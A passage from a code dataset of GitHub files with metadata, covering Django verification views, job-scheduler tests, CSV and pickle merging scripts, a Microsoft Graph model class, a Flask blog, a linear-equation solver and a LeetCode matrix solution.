id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyprojects')\n\n@login_required(login_url = 'login')\ndef deleteprojects(request,id):\n dele = Projects.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyprojects')\n\n@login_required(login_url = 'login')\ndef editverificationprojects(request,id):\n testi = Projects.objects.get(id = id)\n\n if request.method == \"POST\":\n \n projectname = request.POST.get('projectname')\n\n testi.project_name = projectname\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverprojects(request,id):\n sendreq = Projects.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n##########################verify experience ##############\n\n@login_required(login_url = 'login')\ndef verifyexperience(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Experience.objects.filter(company_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Experience.objects.filter(company_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 
'verification/verification-experience.html',context)\n\n@login_required(login_url = 'login')\ndef approveexperience(request,id):\n approve = Experience.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyexperience')\n\n@login_required(login_url = 'login')\ndef deleteexperience(request,id):\n dele = Experience.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyexperience')\n\n@login_required(login_url = 'login')\ndef editverificationexperience(request,id):\n testi = Experience.objects.get(id = id)\n\n if request.method == \"POST\":\n fromyear = request.POST.get('fromyear')\n toyear = request.POST.get('toyear')\n \n \n exp_keywords = request.POST.get('exp_keywords')\n expdetail = request.POST.get('exp_detail')\n comments = request.POST.get('comments')\n responsibility = request.POST.get('responsibility')\n \n testi.fromyear = fromyear\n testi.toyear = toyear\n testi.exp_keywords = exp_keywords\n testi.exp_detail = expdetail\n testi.comments = comments\n testi.responsibily = responsibility\n\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverxperience(request,id):\n \n sendrequ = Experience.objects.get(id = id)\n sendrequ.is_requested = 1\n sendrequ.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n############################SHARE####################\n\n@login_required(login_url = 'login')\ndef share(request):\n\n broushers = Brousher.objects.filter(user_id = request.user.id)\n cards = Cards.objects.filter( user_id = request.user.id )\n images = Image.objects.filter(user_id = request.user.id)\n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n\n context = {\n 'bioview':bioview,\n 'broushers':broushers,\n 'cards':cards,\n 'images':images,\n }\n return render(request,'share/share.html',context)\n\n@login_required(login_url = 'login')\ndef addbrousher(request):\n\n if request.method == \"POST\":\n Brousherimage = request.FILES.get('file')\n brousher = Brousher()\n brousher.brousher = Brousherimage\n brousher.user_id = request.user.id\n brousher.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addcard(request):\n if request.method == \"POST\":\n Cardimg = request.FILES.get('file')\n cards = Cards()\n cards.card = Cardimg\n cards.user_id = request.user.id\n cards.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addimage(request):\n if request.method == \"POST\":\n Img = request.FILES.get('file')\n img = Image()\n img.image = Img\n img.user_id = request.user.id\n img.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef adddocs(request):\n if request.method == \"POST\":\n DOC = request.FILES.get('file')\n doc = Documents()\n doc.DOCS = DOC\n doc.user_id = request.user.id\n doc.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef postreport(request):\n postitems = Post.objects.all()\n print(postitems)\n context = {\n 'postitems':postitems,\n }\n return render(request,'panel/postreport.html',context)\n\n\n\n\n#################jquery company name autocomplete####################\n\n\n# def company_autocomplete(request):\n# if 'term' in request.GET:\n# qs = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n# names = []\n#\n# for 
company in qs:\n# names.append(company.company_name)\n# return JsonResponse(names,safe = False)\n# return render(request,'profile/profile-user-edit.html')\n\n\ndef company_autocomplete(request):\n if 'term' in request.GET:\n qs = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n names = []\n\n for company in qs:\n names.append({'label':company.company_name, 'value':company.user_id})\n return HttpResponse(json.dumps(names), content_type='application/json')\n # return render(request,'profile/profile-user-edit.html')\n\ndef client_autocomplete(request):\n if 'term' in request.GET:\n qs = CustomUser.objects.filter(email__istartswith = request.GET.get('term'))\n # qsc = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n \n names = []\n\n for company in qs:\n #pofilepics = json.dumps(str(company.bio.image))\n \n p = company.bio.address \n fn = company.first_name \n ln = company.last_name \n print(p)\n \n if ln == None:\n ln = ''\n else:\n ln = ln\n \n if p == None :\n \n p = ''\n else:\n p = p\n \n print(p)\n print(fn,ln)\n \n name = fn + ' ' + ln + ' ' + p\n \n \n \n names.append({'label':name , 'value':company.id, 'descr':company.last_name, 'img':name})\n \n \n # for company in qsc:\n # names.append({'label':company.descripcion, 'value':company.user_id})\n \n\n return HttpResponse(json.dumps(names), content_type='application/json')\n \n \n \ndef search_auto(request):\n if request.is_ajax(): \n q = request.GET.get('term', '')\n uname = CustomUser.objects.filter(first_name__istartswith = q) \n results = []\n for u in uname:\n user_json = {'value':0, 'image':0, 'label':0}\n user_json['value'] = u.id\n user_json['label'] = u.first_name\n user_json['img'] = u.picture \n results.append(user_json)\n \n data = json.dumps(results)\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n # return JsonResponse(names,safe = False)\n # return render(request, 'profile/profile-user-edit.html')\n\n\n # def __str__(self):\n # return 'Comment by {} on {}'.format(self.name, self.post)\n\n\n# Download SLides","repo_name":"BlueSapphireTek/kaarmy","sub_path":"social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":73248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20158777432","text":"import datetime\nimport time\n\nfrom django.core.management import _commands, call_command\nfrom django.test import TestCase\n\nfrom chroniker.models import Job, Log#, freqs\nfrom chroniker.tests.commands import Sleeper\n\n#try:\n# from django.utils import unittest\n#except:\n# import unittest\n\nclass JobTestCase(TestCase):\n \n fixtures = ['test_jobs.json']\n \n def setUp(self):\n # Install the test command; this little trick installs the command\n # so that we can refer to it by name\n _commands['test_sleeper'] = Sleeper()\n \n def testJobRun(self):\n \"\"\"\n Test that the jobs run properly.\n \"\"\"\n self.assertEqual(Job.objects.all().count(), 4)\n \n for job in Job.objects.due():\n time_expected = float(job.args)\n \n time_start = time.time()\n #TODO:heartbeat thread can't access sqlite3 models?\n #Throws \"DatabaseError: no such table: chroniker_job\".\n #Causes django-admin.py to consume 100% cpu?\n job.run(update_heartbeat=0)\n time_end = time.time()\n \n time_taken = time_end - time_start\n self.assertAlmostEqual(time_taken, time_expected, delta=4)\n \n def testCronCommand(self):\n \"\"\"\n Test that the ``cron`` command runs all jobs in 
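The approve/reject/send-request views in social/views.py above repeat the same three-line pattern (fetch row, set one integer flag, save, redirect) for every model. A minimal sketch of collapsing them into one parameterized factory; this is not part of the original repo, and make_flag_view is a hypothetical helper name:

from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect

def make_flag_view(model, field, redirect_name):
    # Build a view that sets one integer flag on one row and then redirects,
    # mirroring approvetestimonial / deletetestimonial / approveachievements above.
    @login_required(login_url='login')
    def view(request, id):
        obj = model.objects.get(id=id)
        setattr(obj, field, 1)
        obj.save()
        return redirect(redirect_name)
    return view

# Hypothetical wiring, reusing the models from the original file:
# approvetestimonial = make_flag_view(Testimonial, 'is_approved', 'verifytestimonial')
# deletetestimonial  = make_flag_view(Testimonial, 'is_rejected', 'verifytestimonial')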
parallel.\n \"\"\"\n \n # Pick the longest running Job\n job = sorted(Job.objects.due().filter(command=\"test_sleeper\"), key=lambda j: -int(j.args))[0]\n \n # The \"args\" property simply describes the number of seconds the Job\n # should take to run\n time_expected = float(job.args)\n \n time_start = time.time()\n #call_command('cron', update_heartbeat=0)\n call_command('run_job', job.id, update_heartbeat=0)\n time_end = time.time()\n \n time_taken = time_end - time_start\n self.assertAlmostEqual(time_taken, time_expected, delta=3.5)\n \n def testCronCleanCommand(self):\n \"\"\"\n Test that the ``cron_clean`` command runs properly.\n \"\"\"\n # Pick the shortest running Job\n job = sorted(Job.objects.due().filter(command=\"test_sleeper\"), key=lambda j: int(j.args))[0]\n \n # Run the job 5 times\n for i in range(5):\n job.run(update_heartbeat=0)\n \n # Ensure that we have 5 Log objects\n self.assertEqual(Log.objects.count(), 1)\n \n # Now clean out the logs that are older than 0 minutes (all of them)\n #call_command('cron_clean', 'minutes', '0')\n Log.cleanup()\n \n # Ensure that we have 0 Log objects\n self.assertEqual(Log.objects.count(), 0)\n \n def testDependencies(self):\n \"\"\"\n Confirm inter-job dependencies are detected.\n \"\"\"\n \n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(\n due,\n [Job.objects.get(args=\"1\"), Job.objects.get(args=\"10\")])\n \n # Note, possible bug? call_command() causes all models\n # changes made within the command to be lost.\n # e.g. Even though it appears to correctly run the job,\n # querying the job's next_run date will show the old original date.\n # As a workaround for testing, we just run them all directly.\n #call_command('cron', update_heartbeat=0)\n for job in due:\n job.run(update_heartbeat=0)\n \n #Job.objects.update()\n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(due, [Job.objects.get(args=\"5\")])\n \n for job in due:\n job.run(update_heartbeat=0)\n \n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(due, [Job.objects.get(args=\"2\")])\n ","repo_name":"ryanflores79/virtualenvs","sub_path":"bitstak/lib/python2.7/site-packages/chroniker/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37330395279","text":"#! 
/usr/bin/env python3\n\nimport logging\nimport os\nfrom time import localtime, strftime\n\nimport pandas as pd\n\nimport config as cfg\n\nlogger = logging.getLogger(__name__)\n\n\ndef pandas_merge(date, diva_csv, gor_csv):\n \"\"\"\n Creates a merged CSV from Oracle DBs of the Gorilla MAM and DivaArchive.\n The merge is performed by converting the CSVs to pandas dataframes and using a common key.\n \"\"\"\n\n config = cfg.get_config()\n root_path = config[\"paths\"][\"root_path\"]\n csv_path = config[\"paths\"][\"csv_path\"]\n\n try:\n os.chdir(csv_path)\n\n gor_source = str(gor_csv)\n div_source = str(diva_csv)\n\n gor_reader = pd.read_csv(gor_source)\n div_reader = pd.read_csv(div_source)\n\n merged_csv = date + \"_\" + \"gor_diva_merged_export.csv\"\n\n merge_1_msg = f\"START GORILLA-DIVA DB MERGE\"\n logger.info(merge_1_msg)\n\n with open(merged_csv, mode=\"w+\", encoding=\"utf-8-sig\") as m_csv:\n\n merged_df = gor_reader.merge(div_reader, on=\"GUID\")\n\n merged_df = pd.merge(\n gor_reader,\n div_reader,\n left_on=[\"GUID\"],\n right_on=[\"GUID\"],\n how=\"outer\",\n indicator=True,\n )\n\n left_count = merged_df.loc[\n merged_df._merge == \"left_only\", \"_merge\"\n ].count()\n\n right_count = merged_df.loc[\n merged_df._merge == \"right_only\", \"_merge\"\n ].count()\n\n both_count = merged_df.loc[merged_df._merge == \"both\", \"_merge\"].count()\n\n merged_df.to_csv(m_csv, mode=\"a\", index=False, header=True)\n\n # m_count = merged_df.shape[0]\n # merged_dd = merged.drop_duplicates(subset=\"GUID\", inplace=True)\n # dd_count = merged_dd.shape[0]\n # merged_dd.to_csv(m_csv, mode='a', index=False, header=True)\n\n m_csv.close()\n\n merge_2_msg = f\"\\n\\\n ==================================================================\\n\\\n Gor-DIVA DB MERGE Complete \\n\\\n {str(strftime('%A, %d. 
%B %Y %I:%M%p', localtime()))} \\n\\\n Rows Merged: {str(both_count)}\\n\\\n Unmerged Gorilla Objects: {str(left_count)}\\n\\\n Unmerged Diva Objects: {str(right_count)}\\n\\\n ==================================================================\\\n \"\n\n logger.info(merge_2_msg)\n\n os.chdir(root_path)\n\n return merged_csv\n\n except Exception as e:\n db_merge_excp_msg = f\"\\n\\\n Exception raised on the Gor-Diva DB Merge.\\n\\\n Error Message: {str(e)} \\n\\\n \"\n\n logger.exception(db_merge_excp_msg)\n\n print(db_merge_excp_msg)\n\n\n# if __name__ == '__main__':\n# pandas_merge()\n","repo_name":"scuc/Media-Asset-Migration","sub_path":"merge_dbs.py","file_name":"merge_dbs.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41608888605","text":"import os\nimport pandas as pd \nimport argparse as arg\nimport sys\nimport datetime\nimport csv\nfrom itertools import chain\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\nparser = arg.ArgumentParser()\nparser.add_argument('job', type=str, help='type of job to run, either Merge or Identify')\nparser.add_argument('subreddits', type=str, help='csv list of subreddits to pull')\nparser.add_argument('ptype', type=str, help='either Submissions or Comments')\n\nargs = parser.parse_args(sys.argv[1:])\n\n# get files in directory and create list of files\ndef get_files(dir):\n files = []\n for file in os.listdir(dir):\n if file.endswith(\".pickle\") and os.path.getsize(os.path.join(dir, file)) > 459:\n files.append(os.path.join(dir, file))\n return files.sort()\n\n\ndef identify_missing_files(dir, files):\n missing_files = []\n for file in files:\n if not os.path.exists(os.path.join(dir, file)) or os.path.getsize(os.path.join(dir, file)) <= 459:\n missing_files.append(file)\n return missing_files\n\n\ndef splittimeframe(subreddit, start, end, split): # splits the time into a series of smaller files to pull\n split_list = []\n step = (end - start) / split\n for i in range(split):\n s = int(start + i * step)\n e = int((start + (i + 1) * step) - 1)\n if i == split - 1:\n e += 86400\n split_list.append(f'{subreddit}-{s}.pickle')\n\n return split_list\n\ndef find_existing_pulls(type, subreddits): #remove existing pulls from subreddits list\n done = os.listdir(f'../../Files/{type}/score/')\n done.extend(os.listdir(f'../../Files/{type}/'))\n for i in done:\n done[done.index(i)] = i[:-7]\n res = [i for i in subreddits if i not in done]\n return res\n\ndef merge_splits(files, subreddit, ptype): # merges the files down\n merge_candidates = []\n for file in files:\n try:\n if os.path.getsize(f'../../Files/{ptype}/temp/{file}') > 459:\n if file[:-18] == subreddit:\n merge_candidates.append(f'../../Files/{ptype}/temp/{file}')\n except FileNotFoundError:\n pass\n\n merge_candidates.sort()\n if len(merge_candidates) == 24:\n df = pd.concat([pd.read_pickle(candidate) for candidate in merge_candidates])\n df.to_pickle(f'../../Files/{ptype}/{subreddit}.pickle')\n print(f'{subreddit} merged')\n for i in merge_candidates:\n os.remove(i)\n else:\n print(f'{subreddit} has only {len(merge_candidates)} files to merge. 
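pandas_merge() in merge_dbs.py above relies on pd.merge(..., how="outer", indicator=True) and then counts the _merge categories. A self-contained toy of that technique; the GUID values here are made up:

import pandas as pd

gor = pd.DataFrame({"GUID": ["a", "b", "c"], "gor_val": [1, 2, 3]})
div = pd.DataFrame({"GUID": ["b", "c", "d"], "div_val": [9, 8, 7]})

merged = pd.merge(gor, div, on="GUID", how="outer", indicator=True)
# _merge marks each row's provenance: 'both' = merged on GUID,
# 'left_only' = unmerged Gorilla rows, 'right_only' = unmerged Diva rows.
print(merged["_merge"].value_counts())  # both: 2, left_only: 1, right_only: 1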
Merging not possible.')\n\nwith open(args.subreddits, newline='') as f:\n reader = csv.reader(f)\n subreddits = list(reader)\n\nsubreddits = list(chain.from_iterable(subreddits))\n\nif args.job == 'Identify':\n subreddits_not_completed = find_existing_pulls(args.ptype, subreddits)\n\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp())\n split = 24\n missing_parts = []\n for subreddit in subreddits_not_completed:\n \n subreddit_parts = splittimeframe(subreddit, start, end, split)\n missing = identify_missing_files(f'../../Files/{args.ptype}/temp/', subreddit_parts)\n for m in missing:\n missing_parts.append(m)\n\n\n file = open(f'../../Files/{args.ptype}/temp/missing.csv', \"w\")\n writer = csv.writer(file, delimiter = \"\\n\")\n for list_ in missing_parts:\n writer.writerow([list_])\n file.close()\n\nif args.job == 'Merge':\n files = []\n files = os.listdir(f'../../Files/{args.ptype}/temp/')\n files.pop(files.index('missing.csv'))\n\n t = [file[:-18] for file in files]\n\n subreddits = []\n for i in t:\n if i not in subreddits:\n subreddits.append(i)\n\n for subreddit in subreddits:\n merge_splits(files, subreddit, args.ptype)\n \n\n\n\n\n","repo_name":"jvschlierf/networkthesis","sub_path":"Preprocessing/merge_distr_subs.py","file_name":"merge_distr_subs.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15799175198","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .item_body import ItemBody\n from .post_type import PostType\n\n@dataclass\nclass ServiceHealthIssuePost(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The published time of the post.\n created_date_time: Optional[datetime.datetime] = None\n # The content of the service issue post. The supported value for the contentType property is html.\n description: Optional[ItemBody] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # The post type of the service issue historical post. 
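Note that get_files() in merge_distr_subs.py above ends with `return files.sort()`; list.sort() sorts in place and returns None, so every caller receives None. A corrected sketch of the same function:

import os

def get_files(dir):
    # Collect the non-trivial .pickle files (the 459-byte floor comes from the
    # original), then sort in place and return the list itself.
    files = []
    for file in os.listdir(dir):
        if file.endswith(".pickle") and os.path.getsize(os.path.join(dir, file)) > 459:
            files.append(os.path.join(dir, file))
    files.sort()
    return files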
Possible values are: regular, quick, strategic, unknownFutureValue.\n post_type: Optional[PostType] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> ServiceHealthIssuePost:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: ServiceHealthIssuePost\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return ServiceHealthIssuePost()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .item_body import ItemBody\n from .post_type import PostType\n\n from .item_body import ItemBody\n from .post_type import PostType\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"createdDateTime\": lambda n : setattr(self, 'created_date_time', n.get_datetime_value()),\n \"description\": lambda n : setattr(self, 'description', n.get_object_value(ItemBody)),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"postType\": lambda n : setattr(self, 'post_type', n.get_enum_value(PostType)),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_datetime_value(\"createdDateTime\", self.created_date_time)\n writer.write_object_value(\"description\", self.description)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_enum_value(\"postType\", self.post_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/service_health_issue_post.py","file_name":"service_health_issue_post.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"17874631179","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nfrom flask import Flask, render_template\r\nimport psycopg2\r\nfrom config import config\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef dump_entries():\r\n params = config()\r\n db = psycopg2.connect(**params)\r\n cursor = db.cursor()\r\n cursor.execute(\"select id, date, title, content from entries order by date\")\r\n rows = cursor.fetchall()\r\n output = \"\"\r\n for r in rows:\r\n #debug(str(dict(r)))\r\n output += str(r)\r\n output += \"\\n\"\r\n return \"
    \" + output + \"
    \"\r\n\r\n\r\n@app.route(\"/browse\")\r\ndef browse():\r\n params = config()\r\n db = psycopg2.connect(**params)\r\n cursor = db.cursor()\r\n cursor.execute(\"select id, date, title, content from entries order by date\")\r\n rowlist = cursor.fetchall()\r\n print(rowlist)\r\n return render_template(\"browse.html\", entries=rowlist)\r\n\r\nif __name__ == \"__main__\":\r\n app.run()\r\n","repo_name":"volodbol/obdz-lab3","sub_path":"blog/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33857459863","text":"import sys\n\ninput = sys.stdin.read()\nnumbers = input.split()\nnumber_i = 0\n\ndef get_num():\n\tglobal number_i\n\tvalue = int(numbers[number_i])\n\tnumber_i = number_i + 1\n\treturn value\n\nrows = get_num()\ncols = get_num()\n\nmatrix = []\nright = rows * [0]\n\nfor row in range(0, rows):\n\tmatrix.append([])\n\tfor col in range(0, cols):\n\t\tmatrix[row].append(get_num())\n\tright[row] = get_num()\n\ndef stringify_matrix(m, r, prec):\n\tdef format_num(n, prec):\n\t\treturn ('{0:.' + str(prec) + 'f}').format(n)\n\tdef calc_num_width(n, prec):\n\t\treturn len(format_num(n, prec))\n\tdef calc_row_width(ns, prec):\n\t\tw = 0 \n\t\tfor i in range(0, len(ns)):\n\t\t\twi = calc_num_width(ns[i], prec)\n\t\t\tif wi > w:\n\t\t\t\tw = wi\n\t\treturn w\n\tdef calc_matrix_width(m, prec):\n\t\tw = 0\n\t\tfor row in range(0, len(m)):\n\t\t\tw_row = calc_row_width(m[row], prec)\n\t\t\tif w_row > w:\n\t\t\t\tw = row\n\t\treturn w\n\tw = calc_matrix_width(m, prec)\n\trw = calc_row_width(r, prec)\n\t#print([1111111, m, r, prec, w, rw])\n\tdef str_num(n, prec, w):\n\t\t#print(['str_num', n, prec, w])\n\t\ts = format_num(n, prec)\n\t\tpadding = ' ' * (w - len(s))\n\t\treturn padding + s\n\tdef str_row(row, prec, w, r, w_r):\n\t\t#print(['str_row', row, prec, w, r, w_r])\n\t\ts = ''\n\t\tfor i in range(0, len(row)):\n\t\t\tif i != 0:\n\t\t\t\ts = s + ' '\n\t\t\ts = s + str_num(row[i], prec, w)\n\t\ts = s + ' | ' + str_num(r, prec, w_r)\t\n\t\treturn s\n\ts = ''\n\tfor i in range (0, len(m)):\n\t\ts = s + str_row(m[i], prec, w, r[i], rw) + '\\n'\n\treturn s\n\t\n#print(stringify_matrix(matrix, right, 1))\n#print(stringify_matrix(matrix, right, 2))\n#print(stringify_matrix(matrix, right, 3))\n#print(stringify_matrix(matrix, right, 4))\n#print(stringify_matrix(matrix, right, 0))\n#exit()\n\n# return row of first nonzero element starting with matrix[n][n] and down\n# or return -1\ndef find_nonzero(matrix, r, c):\n\tfor row in range(r, len(matrix)):\n\t\tif matrix[row][c] != 0:\n\t\t\treturn row\n\treturn -1\n\n# swap matrixes and right parts rows\t\ndef swap_rows(matrix, right, r1, r2):\n\trow1 = matrix[r1]\n\tmatrix[r1] = matrix[r2]\n\tmatrix[r2] = row1\n\trow1 = right[r1]\n\tright[r1] = right[r2]\n\tright[r2] = row1\n\n# leave non-zero matrix[n][n] or make it swapping two lines\n# return False if it has only zeros\n# that means infinite solutions\ndef make_nonzero_base(matrix, right, r, c):\n\tnonzero_row = find_nonzero(matrix, r, c)\n\tif nonzero_row < 0:\n\t\treturn False\n\tif nonzero_row != r:\n\t\tswap_rows(matrix, right, nonzero_row, r)\n\treturn True\n\t\t\n#make_nonzero_base(matrix, 1)\n#print(matrix)\n#exit()\n\n# return False for infinite solutions\ndef rid_of_col(matrix, right, r, c):\n\tif not make_nonzero_base(matrix, right, r, c):\n\t\treturn False\n\tbase = matrix[r][c]\n\tfor row in range(r + 1, len(matrix)):\n\t\tmul = matrix[row][c] / base\n\t\tfor col in 
range(c, len(matrix[row])):\n\t\t\tmatrix[row][col] = matrix[row][col] - matrix[r][col] * mul\n\t\tright[row] = right[row] - right[r] * mul\n\treturn True\n\n\n# return for infinite solutions\ndef make_triangle(matrix, cols, right):\t\n\trow = 0\n\tfor n in range(0, cols):\n\t\t#print(stringify_matrix(matrix, right, 2))\n\t\t#print('rid of ' + str(n))\n\t\tif rid_of_col(matrix, right, row, n):\n\t\t\trow = row + 1\n\t\t#print(stringify_matrix(matrix, right, 2))\n\t\t#print('----------------------')\n\t#print(matrix)\n\t\ndef rid_of_tail_zeros(matrix, cols, right):\n\tfor row in range(len(matrix) - 1, -1, -1):\n\t\tif matrix[row][cols - 1] != 0:\n\t\t\treturn True\n\t\tif right[row] != 0:\n\t\t\treturn False\n\t\tdel matrix[row]\n\t\tdel right[row]\n\treturn False\n\t\ndef solve(matrix, cols, right):\n\tmake_triangle(matrix, cols, right)\n\t#print(stringify_matrix(matrix, right, 2))\n\tok = rid_of_tail_zeros(matrix, cols, right)\n\tif not ok:\n\t\treturn 0 # no solutions\n\tif len(matrix) > cols:\n\t\treturn 0 # no solutions, duplicates previous check\n\tif len(matrix) < cols:\n\t\treturn -1 # infinite solutions\n\tx = cols * [0]\n\t\n\tdef calc_x(row, right, n):\n\t\tr = right\n\t\tfor c in range(n + 1, len(row)):\n\t\t\tr = r - row[c] * x[c]\n\t\tk = row[n]\n\t\treturn r / k\n\t\t\n\tfor r in range(len(matrix) - 1, -1, -1):\n\t\tx[r] = calc_x(matrix[r], right[r], r)\n\t\n\treturn x # single solution\n\t\n#print(stringify_matrix(matrix, right, 2))\n#print(solve(matrix, cols, right))\n#print(stringify_matrix(matrix, right, 2))\n\nresult = solve(matrix, cols, right)\nif type(result) is list:\n\ts = ''\n\tfor i in range(0, len(result)):\n\t\tif i != 0:\n\t\t\ts = s + ' '\n\t\ts = s + str(result[i])\n\tprint('YES')\n\tprint(s)\nelse:\n\tif result < 0:\n\t\tprint('INF')\n\telse:\n\t\tprint('NO')","repo_name":"ZzDmitry/linalg","sub_path":"1/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1438478315","text":"import importlib\nimport torch\nfrom option import args\n\n\nif __name__ == \"__main__\":\n args.model_name = 'EDSR'\n args.angRes_in = 5\n args.scale_factor = 4\n\n device = torch.device(args.device)\n if 'cuda' in args.device:\n torch.cuda.set_device(device)\n\n MODEL_PATH = args.model_name\n MODEL = importlib.import_module(MODEL_PATH)\n net = MODEL.get_model(args).to(device)\n total = sum([param.nelement() for param in net.parameters()])\n print(' Number of parameters: %.4fM' % (total / 1e6))\n","repo_name":"ZhengyuLiang24/BasicLFSR","sub_path":"model/SR/cal_Params.py","file_name":"cal_Params.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"37"} +{"seq_id":"71942434988","text":"'''\r\nCreated on 1.12.2016\r\n\r\n@author: Darren\r\n''''''\r\n\r\r\nGiven a m x n matrix, if an element is 0, set its entire row and column to 0. 
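Two remarks on the Gaussian-elimination script above: calc_matrix_width assigns `w = row` where `w = w_row` looks intended (it is only reachable from the commented-out debug prints), and solve() mutates its arguments, so callers should pass copies. A quick cross-check against NumPy on a small well-determined system; the values are illustrative only:

import numpy as np

A = [[2.0, 1.0], [1.0, 3.0]]
b = [5.0, 10.0]
x = solve([row[:] for row in A], 2, b[:])  # pass copies, since solve() mutates
print(x)                                   # [1.0, 3.0]
print(np.linalg.solve(np.array(A), np.array(b)))  # same answer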
Do it in place. \r\r\n\r\r\nclick to show follow up.\r\r\n\r\r\nFollow up:\r\r\n\r\r\n\r\r\nDid you use extra space?\r\r\nA straight forward solution using O(mn) space is probably a bad idea.\r\r\nA simple improvement uses O(m + n) space, but still not the best solution.\r\r\nCould you devise a constant space solution?\r\r\n\r\r\n\" \r\n'''\r\nclass Solution(object):\r\n    def setZeroes(self, matrix):\r\n        \"\"\"\r\n        :type matrix: List[List[int]]\r\n        :rtype: void Do not return anything, modify matrix in-place instead.\r\n        \"\"\"\r\n        if not matrix or not matrix[0]:\r\n            return\r\n        row_flag,col_flag=False,False\r\n        for row in range(len(matrix)):\r\n            if matrix[row][0]==0:\r\n                row_flag=True\r\n                break\r\n        for col in range(len(matrix[0])):\r\n            if matrix[0][col]==0:\r\n                col_flag=True\r\n                break\r\n        for row in range(len(matrix)):\r\n            for col in range(len(matrix[0])):\r\n                if matrix[row][col]==0:\r\n                    matrix[row][0]=0\r\n                    matrix[0][col]=0\r\n        for row in range(1,len(matrix)):\r\n            for col in range(1,len(matrix[0])):\r\n                if matrix[0][col]==0 or matrix[row][0]==0:\r\n                    matrix[row][col]=0\r\n        if row_flag:\r\n            for row in 